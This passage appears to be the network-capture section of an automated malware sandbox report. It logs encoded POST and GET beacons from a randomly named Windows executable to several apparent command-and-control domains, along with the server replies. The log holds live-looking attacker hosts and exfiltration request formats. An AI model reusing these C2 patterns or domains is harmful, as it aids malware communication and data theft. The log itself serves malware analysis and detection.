                                                                                                                                            Data Raw: 35 76 63 3d 32 61 6a 59 6a 65 4b 34 4e 55 4e 39 37 74 68 57 48 32 38 61 49 69 58 71 54 66 31 4a 44 53 34 42 6e 51 54 36 78 78 51 6c 78 54 4b 79 71 62 51 71 78 77 38 69 54 64 76 67 4b 69 35 63 4c 59 55 67 4c 6c 33 32 4e 72 42 38 6a 75 42 48 66 47 51 63 48 77 56 31 6a 37 41 51 51 58 65 79 70 2f 4f 76 36 47 6f 6e 48 68 6c 30 77 44 36 51 6b 6c 2b 43 49 66 53 4b 33 39 4c 6b 6f 75 32 55 4e 49 4e 64 33 38 48 30 70 52 5a 47 41 4d 6a 6b 58 65 30 76 65 69 69 76 59 43 36 61 68 4f 6d 69 54 76 4d 44 46 4d 2b 32 43 53 43 62 69 61 52 34 38 75 50 56 6e 49 6a 49 4e 34 4c 79 4a 4b 6d 38 62 51 44 6a 32 67 6b 78 65 63 74 6d 46 70 54 36 41 55 44 55 61 34 6f 76 64 47 76 48 31 6f 74 68 71 42 57 76 4f 36 52 50 64 6d 2b 6b 58 2f 6a 59 66 79 5a 42 38 51 77 79 68 30 70 6d 38 32 54 53 41 31 31 2f 72 63 53 4c 56 77 44 69 6a 33 6e 6a 2f 68 52 6e 56 77 45 30 2b 63 37 44 53 65 64 48 6f 50 64 7a 58 65 4b 7a 4f 51 56 2b 6e 75 42 57 30 58 77 5a 32 5a 66 48 78 44 33 37 71 7a 6b 71 6b 51 36 79 6b 46 32 67 36 62 54 41 7a 59 32 47 54 63 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=2ajYjeK4NUN97thWH28aIiXqTf1JDS4BnQT6xxQlxTKyqbQqxw8iTdvgKi5cLYUgLl32NrB8juBHfGQcHwV1j7AQQXeyp/Ov6GonHhl0wD6Qkl+CIfSK39Lkou2UNINd38H0pRZGAMjkXe0veiivYC6ahOmiTvMDFM+2CSCbiaR48uPVnIjIN4LyJKm8bQDj2gkxectmFpT6AUDUa4ovdGvH1othqBWvO6RPdm+kX/jYfyZB8Qwyh0pm82TSA11/rcSLVwDij3nj/hRnVwE0+c7DSedHoPdzXeKzOQV+nuBW0XwZ2ZfHxD37qzkqkQ6ykF2g6bTAzY2GTcwe197ztxWjADrbVRzxzSiynVw08P/pIZtCBzp1pWCmtzMRX97WFdHPYiCh9plJvTEbRi37q15AaWNdeRyUEcwlK/EPtXbrixrWT3+t2Y2UaG8amh1mvF78Hi53CirYKF+gXcw5n6JOgOaEY1vrTSo4YNebNxgH/kXnqjUs05j0YKL5PraU1Mpeizkn+NbsTd0EXrghudHlL2M6QxkwI4CaZ5hSLozfBN+SwIhb9RTxrWW6emb2A12uS8NoSwrmT6gQcXtAiGGiQ7zym09hzEB87P6jqNpdrDZIwfTMJnHxNo9yTWzTNRBZpC2WmYrjZmHNeCiogbLm2wolCBnzH00dLZO9k9/PW25MSQFNfjDd1zv0tng1pnFd0ISK1Zf7rn3wrxC6oWbq6sa8Cb+9aeTw4K3TZ99Bydsm31zem7bV56aGs/uiVqvuQc2iv2KCh8/aZmg8QFVq3C2B+WP9q9r4YymqcXI5fYvbUG8hxUEURSdQnsbcbKAxj2v9dc3+Hg83v9E8rgEHHw0QAu6s0uNufA8GlkeXhF9ahGpIYfZeb73oGYG4g1jINX5fn+caNc3pLZ63pcXarhfg8y2f39RVWzn47MKAf/U899NSe1RS4sD5Jd0tMckKj7zu76qrGFbwJPoTNEROcZKndF6JJEZCJU6MU4v4DYP9 [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.6613913.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:51:59.879329920 CEST505OUTGET /4qpg/?lLYL=kvUX&5vc=7YL4gquCN0E55MFUOU9pAg/pZfkwLQQKii7X4zB1/APnuYQ63ytlc9rdDU84d9EdPhCMcrEauI5xN2RdLzEruIlUX3fWqfOqjWcwC1p6yjm3sUGyC92I8On0vrGkOogLmLiKp0c= HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.takitoon.xyz
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:52:00.340590954 CEST405INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:00 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 265
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 4c 59 4c 3d 6b 76 55 58 26 35 76 63 3d 37 59 4c 34 67 71 75 43 4e 30 45 35 35 4d 46 55 4f 55 39 70 41 67 2f 70 5a 66 6b 77 4c 51 51 4b 69 69 37 58 34 7a 42 31 2f 41 50 6e 75 59 51 36 33 79 74 6c 63 39 72 64 44 55 38 34 64 39 45 64 50 68 43 4d 63 72 45 61 75 49 35 78 4e 32 52 64 4c 7a 45 72 75 49 6c 55 58 33 66 57 71 66 4f 71 6a 57 63 77 43 31 70 36 79 6a 6d 33 73 55 47 79 43 39 32 49 38 4f 6e 30 76 72 47 6b 4f 6f 67 4c 6d 4c 69 4b 70 30 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lLYL=kvUX&5vc=7YL4gquCN0E55MFUOU9pAg/pZfkwLQQKii7X4zB1/APnuYQ63ytlc9rdDU84d9EdPhCMcrEauI5xN2RdLzEruIlUX3fWqfOqjWcwC1p6yjm3sUGyC92I8On0vrGkOogLmLiKp0c="}</script></head></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.66139238.47.233.65805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:05.777771950 CEST758OUTPOST /g9xe/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.nng65.top
                                                                                                                                            Origin: http://www.nng65.top
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.nng65.top/g9xe/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 42 4a 71 2f 7a 66 55 66 4e 68 36 5a 34 51 44 67 71 71 35 73 68 39 61 6b 62 63 61 4e 33 43 7a 55 4f 4f 66 39 59 55 6b 50 54 34 59 4b 63 53 2f 54 55 77 34 47 63 30 59 6b 54 37 79 4b 51 36 73 6a 6f 6d 36 57 72 33 35 46 43 53 62 55 4e 53 45 4e 6e 44 30 79 36 57 53 34 35 6c 59 77 39 6b 7a 74 63 7a 55 57 79 70 36 52 6b 31 55 59 6e 53 57 75 33 50 68 65 53 67 65 34 53 57 64 49 53 46 4d 37 46 69 65 49 47 66 54 45 30 42 47 41 79 76 47 63 41 6a 4d 77 43 51 38 5a 2b 59 4d 6d 4b 2b 36 73 61 79 49 45 76 32 56 39 64 55 65 52 78 2f 64 4b 2f 36 39 4b 54 67 44 47 46 77 35 32 6e 70 64 56 68 76 69 65 6d 6c 55 59 5a 37 46 38
                                                                                                                                            Data Ascii: 5vc=BJq/zfUfNh6Z4QDgqq5sh9akbcaN3CzUOOf9YUkPT4YKcS/TUw4Gc0YkT7yKQ6sjom6Wr35FCSbUNSENnD0y6WS45lYw9kztczUWyp6Rk1UYnSWu3PheSge4SWdISFM7FieIGfTE0BGAyvGcAjMwCQ8Z+YMmK+6sayIEv2V9dUeRx/dK/69KTgDGFw52npdVhviemlUYZ7F8
                                                                                                                                            Oct 10, 2024 12:52:06.772964001 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 146
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.66139338.47.233.65805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:08.321839094 CEST782OUTPOST /g9xe/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.nng65.top
                                                                                                                                            Origin: http://www.nng65.top
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.nng65.top/g9xe/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 42 4a 71 2f 7a 66 55 66 4e 68 36 5a 34 7a 62 67 6f 4e 6c 73 6d 64 61 6e 47 73 61 4e 35 69 79 38 4f 4f 62 39 59 57 4a 4b 53 4b 4d 4b 63 77 6e 54 56 79 51 47 52 55 59 6b 64 62 79 31 55 36 73 6f 6f 6d 6d 6b 72 33 31 46 43 53 6e 55 4e 58 67 4e 6e 77 73 78 37 47 53 6d 78 46 59 2b 79 45 7a 74 63 7a 55 57 79 70 75 37 6b 78 34 59 6b 69 6d 75 32 75 68 64 54 67 65 33 43 32 64 49 57 46 4d 67 46 69 65 71 47 64 6e 75 30 45 4b 41 79 72 4f 63 41 53 4d 7a 4a 51 38 54 7a 34 4e 33 61 62 6e 32 64 53 5a 68 67 46 52 75 46 54 6d 4f 39 70 63 51 6a 4a 39 70 42 77 6a 45 46 79 68 45 6e 4a 64 2f 6a 76 61 65 30 79 59 2f 57 50 67 66 45 73 57 2f 47 6b 37 33 31 4e 57 38 71 33 74 4a 76 71 73 64 67 51 3d 3d
                                                                                                                                            Data Ascii: 5vc=BJq/zfUfNh6Z4zbgoNlsmdanGsaN5iy8OOb9YWJKSKMKcwnTVyQGRUYkdby1U6soommkr31FCSnUNXgNnwsx7GSmxFY+yEztczUWypu7kx4Ykimu2uhdTge3C2dIWFMgFieqGdnu0EKAyrOcASMzJQ8Tz4N3abn2dSZhgFRuFTmO9pcQjJ9pBwjEFyhEnJd/jvae0yY/WPgfEsW/Gk731NW8q3tJvqsdgQ==
                                                                                                                                            Oct 10, 2024 12:52:09.228620052 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:09 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 146
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.66139438.47.233.65805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:10.888828993 CEST1795OUTPOST /g9xe/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.nng65.top
                                                                                                                                            Origin: http://www.nng65.top
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.nng65.top/g9xe/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 42 4a 71 2f 7a 66 55 66 4e 68 36 5a 34 7a 62 67 6f 4e 6c 73 6d 64 61 6e 47 73 61 4e 35 69 79 38 4f 4f 62 39 59 57 4a 4b 53 4b 55 4b 63 44 76 54 61 31 4d 47 51 55 59 6b 44 4c 79 4f 55 36 73 31 6f 6d 2b 67 72 32 49 77 43 58 6a 55 4d 31 6f 4e 68 46 41 78 77 47 53 6d 39 6c 59 7a 39 6b 7a 43 63 7a 45 53 79 70 2b 37 6b 78 34 59 6b 67 2b 75 6d 50 68 64 65 41 65 34 53 57 64 50 53 46 4e 75 46 69 47 51 47 64 6a 55 30 33 43 41 38 72 65 63 43 41 6b 7a 41 51 38 64 39 59 4e 76 61 62 69 6f 64 53 46 4c 67 47 4e 45 46 55 57 4f 2b 65 64 77 2f 6f 46 78 43 67 2b 6e 62 53 52 6e 73 4d 52 6a 72 59 32 68 31 44 49 58 52 39 67 6d 46 4d 6e 68 46 48 71 4c 69 4e 65 57 69 78 51 69 6c 4c 31 2f 67 64 61 31 55 51 5a 72 56 43 44 39 42 46 42 64 67 38 4f 36 73 50 32 39 47 52 30 2b 75 50 48 50 53 49 45 45 4a 55 49 31 43 44 78 38 4c 32 6a 31 49 6b 6b 76 52 56 31 32 4a 53 68 47 6b 4f 63 37 53 7a 79 5a 51 64 50 45 70 68 47 4d 71 6d 74 6d 59 4b 62 41 70 33 4a 42 54 4d 56 30 54 77 4f 70 76 2b 38 53 51 65 6e 7a 6b 6c 5a 79 45 43 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=BJq/zfUfNh6Z4zbgoNlsmdanGsaN5iy8OOb9YWJKSKUKcDvTa1MGQUYkDLyOU6s1om+gr2IwCXjUM1oNhFAxwGSm9lYz9kzCczESyp+7kx4Ykg+umPhdeAe4SWdPSFNuFiGQGdjU03CA8recCAkzAQ8d9YNvabiodSFLgGNEFUWO+edw/oFxCg+nbSRnsMRjrY2h1DIXR9gmFMnhFHqLiNeWixQilL1/gda1UQZrVCD9BFBdg8O6sP29GR0+uPHPSIEEJUI1CDx8L2j1IkkvRV12JShGkOc7SzyZQdPEphGMqmtmYKbAp3JBTMV0TwOpv+8SQenzklZyECBx8N/xmeagjsLTbChuY++c9oyj2Z0KM719nokYOlP0bvJPeeWgThLEn/CanSV2bQ/jwtKA5TqdsqeyMZQ2Ogm/EZlPYYCAaXKMvvYZCFoYcrbJLltzdUO60MIGY0tUGP0zdev8aPlm9AFxRV9Oet8pN8RC4QEsV18Q8zdhWOz09SMYXFlKAvR+I+QSsijHKYc/xDNyWQRuyl8CW+Wm8e/WSlAvfuTVd+bW9ZbRfrJR6kXe0bpE+fE3Gfw88IZFEvvzyIT/ZJQWxymUBDaCzeESSapH/C6FY4o9d5cKEJN7GCTZoJ06TU3wVW8Aalz6CGZCn9sxMlLICV3Dbgwt6NkJDRDuhCJHKaqM6+srUiIHnGEtWzzruRT0OXDNC9zNjrpmuPXWoMEG3hdkR2tqPZXKSFPTFMLocxaK35cQxIGbUe5e6zMQUBmyTqXDqCEeniQaNcUcgk5kkV1+P6qAc/WqTZtZAtMuPd84ROapydPDIZjhA36BrJoC+3/Ep9KOvEcV6O0DhBJhnFSu/0OCWZWwhu4sr6+UU9XuPdEhulcR7zEqGmo8RAEArEGfNO+Qsp86rIG0qi+O+GlcVdhoit4vZjsL9u8TvuleVEGVAE1EXSxEQiEPfS/V9FyhmovhYhPnfPADYEYMUwXBNne2Wj5XVMlphp/igUa/ [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:52:12.574728012 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 146
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                            Oct 10, 2024 12:52:12.575378895 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 146
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                            Oct 10, 2024 12:52:12.576731920 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 146
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.66139638.47.233.65805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:13.429264069 CEST502OUTGET /g9xe/?5vc=MLCfwq0OLzOW6QPmgLFQnuGoPPrQyzTDS43mRmpffLpQSwrMWSBFbGoKeLq/FK43j0+k/VozFS/nBlsWqz4m9kWG5HZt62rlPRgv7u+rlw8JrCSD2NF9WC2SMGJleFo1CnmOFq8=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.nng65.top
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:52:14.355374098 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 146
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.661398188.114.97.3805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:19.413363934 CEST785OUTPOST /fxts/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.bayarcepat19.click
                                                                                                                                            Origin: http://www.bayarcepat19.click
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.bayarcepat19.click/fxts/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 48 44 44 74 6c 73 39 48 70 33 44 6a 73 62 61 58 6f 68 50 35 69 44 54 4b 46 6b 51 2b 4e 67 47 37 41 2f 74 56 62 49 46 68 37 56 39 6b 51 4b 6d 4e 63 68 66 6d 52 67 37 6b 4a 48 35 36 47 49 5a 61 55 65 64 49 44 6b 77 43 49 55 76 71 4a 65 69 50 35 76 74 35 66 64 34 38 35 4e 4d 74 75 66 76 30 33 63 68 45 45 65 2f 5a 35 6a 52 6f 58 46 52 56 33 4a 54 6f 4f 62 33 6a 6d 39 61 66 42 4b 4e 78 6a 4c 34 79 34 2f 37 4f 2b 6a 74 69 56 72 56 59 5a 74 62 67 30 4f 54 68 54 56 41 4f 45 42 42 65 39 70 76 6e 36 39 56 64 43 49 4b 72 61 49 4a 69 73 72 6f 2f 7a 56 36 70 47 61 35 32 6f 58 74 36 62 58 62 4c 31 48 4c 52 33 78 4d 66
                                                                                                                                            Data Ascii: 5vc=HDDtls9Hp3DjsbaXohP5iDTKFkQ+NgG7A/tVbIFh7V9kQKmNchfmRg7kJH56GIZaUedIDkwCIUvqJeiP5vt5fd485NMtufv03chEEe/Z5jRoXFRV3JToOb3jm9afBKNxjL4y4/7O+jtiVrVYZtbg0OThTVAOEBBe9pvn69VdCIKraIJisro/zV6pGa52oXt6bXbL1HLR3xMf
                                                                                                                                            Oct 10, 2024 12:52:19.875600100 CEST847INHTTP/1.1 301 Moved Permanently
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:19 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 167
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                            Expires: Thu, 10 Oct 2024 11:52:19 GMT
                                                                                                                                            Location: https://www.bayarcepat19.click/fxts/
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7bJ7LJpzDZoAlTLDpdZQyMOVdpF6k1mgZDVvtTTWJDwixKKTGgKR7AE2EKnmAWYxpjtTsYFYale6Mc3yUaoOuS2XyWIHX0lYJELK9vuqA11LEhd%2FVvKrfTcagKEeLu7lagNwFQ4lAx89"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d060f6fee218c75-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
